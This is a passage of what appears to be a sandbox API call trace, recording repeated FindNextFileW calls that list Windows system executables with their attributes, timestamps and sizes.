nFileSizeHigh=0x0, nFileSizeLow=0x89400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dfrgui.exe", cAlternateFileName="")) returned 1 [0107.909] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3142952e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3142952e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3142952e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dialer.exe", cAlternateFileName="")) returned 1 [0107.909] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29be8d06, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29be8d06, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29be8d06, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24200, dwReserved0=0x0, dwReserved1=0x0, cFileName="diskpart.exe", cAlternateFileName="")) returned 1 [0107.909] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa36e9f, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa36e9f, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa36e9f, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="diskperf.exe", cAlternateFileName="")) returned 1 [0107.910] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29be8d06, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29be8d06, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29be8d06, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x46200, dwReserved0=0x0, dwReserved1=0x0, cFileName="diskraid.exe", cAlternateFileName="")) returned 1 [0107.910] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aaa95a6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aaa95a6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aaa95a6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x37960, dwReserved0=0x0, dwReserved1=0x0, cFileName="Dism.exe", cAlternateFileName="")) returned 1 [0107.910] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x314e80ea, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x314e80ea, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x314e80ea, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d5970, dwReserved0=0x0, dwReserved1=0x0, cFileName="DisplaySwitch.exe", cAlternateFileName="")) returned 1 [0107.910] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab41f0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ab41f0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ab41f0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4560, dwReserved0=0x0, dwReserved1=0x0, cFileName="dllhost.exe", cAlternateFileName="")) returned 1 [0107.911] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ab6816b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ab6816b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ab6816b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="dllhst3g.exe", cAlternateFileName="")) returned 1 [0107.911] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f182fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28f182fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28f182fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="doskey.exe", cAlternateFileName="")) returned 1 [0107.963] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba4ec65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba4ec65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba4ec65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dpapimig.exe", cAlternateFileName="")) returned 1 [0107.963] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31580a50, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x31580a50, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x31580a50, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13000, dwReserved0=0x0, dwReserved1=0x0, cFileName="DpiScaling.exe", cAlternateFileName="")) returned 1 [0107.963] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2feb42d5, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2feb42d5, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dplaysvr.exe", cAlternateFileName="")) returned 1 [0107.964] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2feda52b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2feda52b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2feda52b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="dpnsvr.exe", cAlternateFileName="")) returned 1 [0107.965] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29bc2aaf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29bc2aaf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29be8d06, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10800, dwReserved0=0x0, dwReserved1=0x0, cFileName="driverquery.exe", cAlternateFileName="")) returned 1 [0107.965] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e8f2bc7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e8f2bc7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e8f2bc7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7200, dwReserved0=0x0, dwReserved1=0x0, cFileName="dtdump.exe", cAlternateFileName="")) returned 1 [0107.966] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d16788e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d16788e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d16788e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="dvdplay.exe", cAlternateFileName="")) returned 1 [0107.966] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d141630, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d141630, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d141630, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="dvdupgrd.exe", cAlternateFileName="")) returned 1 [0107.966] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x333e69a8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x333e69a8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x333e69a8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x23c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="DWWIN.EXE", cAlternateFileName="")) returned 1 [0107.966] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x332b56d8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x332b56d8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x332b56d8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x48c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="dxdiag.exe", cAlternateFileName="")) returned 1 [0107.967] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cb71a8e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2cb71a8e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2cb71a8e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x43c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="EaseOfAccessDialog.exe", cAlternateFileName="")) returned 1 [0107.967] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ac731d8, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ac731d8, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ac731d8, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8400, dwReserved0=0x0, dwReserved1=0x0, cFileName="edpnotify.exe", cAlternateFileName="")) returned 1 [0107.967] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b99009d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2b99009d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2b99009d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3200, dwReserved0=0x0, dwReserved1=0x0, cFileName="efsui.exe", cAlternateFileName="")) returned 1 [0107.967] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5126025c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5126025c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x512864b6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1d800, dwReserved0=0x0, dwReserved1=0x0, cFileName="EhStorAuthn.exe", cAlternateFileName="")) returned 1 [0107.968] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba28a07, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba28a07, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba28a07, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4a200, dwReserved0=0x0, dwReserved1=0x0, cFileName="esentutl.exe", cAlternateFileName="")) returned 1 [0107.968] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x316193ba, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x316193ba, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x316193ba, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x49e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eudcedit.exe", cAlternateFileName="")) returned 1 [0107.968] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x282b9ff6, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x282b9ff6, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x282b9ff6, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="eventcreate.exe", cAlternateFileName="")) returned 1 [0107.968] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x283c5070, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x283c5070, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x283c5070, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="eventvwr.exe", cAlternateFileName="")) returned 1 [0107.969] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28ea5bef, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28ea5bef, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28ea5bef, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xd400, dwReserved0=0x0, dwReserved1=0x0, cFileName="expand.exe", cAlternateFileName="")) returned 1 [0107.969] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x315a6caf, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x315a6caf, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x315ccf05, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3e0440, dwReserved0=0x0, dwReserved1=0x0, cFileName="explorer.exe", cAlternateFileName="")) returned 1 [0107.969] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7400, dwReserved0=0x0, dwReserved1=0x0, cFileName="extrac32.exe", cAlternateFileName="")) returned 1 [0107.969] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28de7026, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28de7026, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28de7026, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fc.exe", cAlternateFileName="")) returned 1 [0107.970] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f182fa, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28f182fa, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28f182fa, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="find.exe", cAlternateFileName="")) returned 1 [0107.970] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28e5973a, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28e5973a, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28e5973a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x7600, dwReserved0=0x0, dwReserved1=0x0, cFileName="findstr.exe", cAlternateFileName="")) returned 1 [0107.970] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e66a3d4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2e66a3d4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2e66a3d4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x0, dwReserved1=0x0, cFileName="finger.exe", cAlternateFileName="")) returned 1 [0107.970] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2bae75c4, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2bae75c4, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2bae75c4, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4200, dwReserved0=0x0, dwReserved1=0x0, cFileName="fixmapi.exe", cAlternateFileName="")) returned 1 [0107.971] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3edbc68e, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x3edbc68e, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x56fa813a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc5df8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FlashPlayerApp.exe", cAlternateFileName="FLASHP~1.EXE")) returned 1 [0107.971] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fbb93d3, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2fbb93d3, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2fbb93d3, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x5800, dwReserved0=0x0, dwReserved1=0x0, cFileName="fltMC.exe", cAlternateFileName="")) returned 1 [0107.971] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x315f315c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x315f315c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x315f315c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x18200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fondue.exe", cAlternateFileName="")) returned 1 [0107.971] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2001f0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2d2001f0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2d2001f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x84050, dwReserved0=0x0, dwReserved1=0x0, cFileName="fontdrvhost.exe", cAlternateFileName="")) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3163f611, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3163f611, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3163f611, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="fontview.exe", cAlternateFileName="")) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29e714f9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x29e714f9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x29e714f9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x0, dwReserved1=0x0, cFileName="forfiles.exe", cAlternateFileName="")) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2abda86e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2abda86e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2abda86e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1f400, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsquirt.exe", cAlternateFileName="")) returned 1 [0107.972] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9ea9ee, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2a9ea9ee, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2a9ea9ee, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1e600, dwReserved0=0x0, dwReserved1=0x0, cFileName="fsutil.exe", cAlternateFileName="")) returned 1 [0107.973] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3077ed75, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x3077ed75, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x3077ed75, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xc000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ftp.exe", cAlternateFileName="")) returned 1 [0107.973] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2feda52b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2feda52b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2feda52b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x84200, dwReserved0=0x0, dwReserved1=0x0, cFileName="GamePanel.exe", cAlternateFileName="")) returned 1 [0107.973] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28352954, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x28352954, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x28352954, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xfe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="getmac.exe", cAlternateFileName="")) returned 1 [0107.982] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ba4ec65, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2ba4ec65, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2ba4ec65, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x30e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="gpresult.exe", cAlternateFileName="")) returned 1 [0107.982] FindNextFileW (in: hFindFile=0x678698, lpFindFileData=0x19e810 | out: lpFindFileData=0x19e810*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x583ec0cb, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x670fea90, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x670fea90, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x9600, 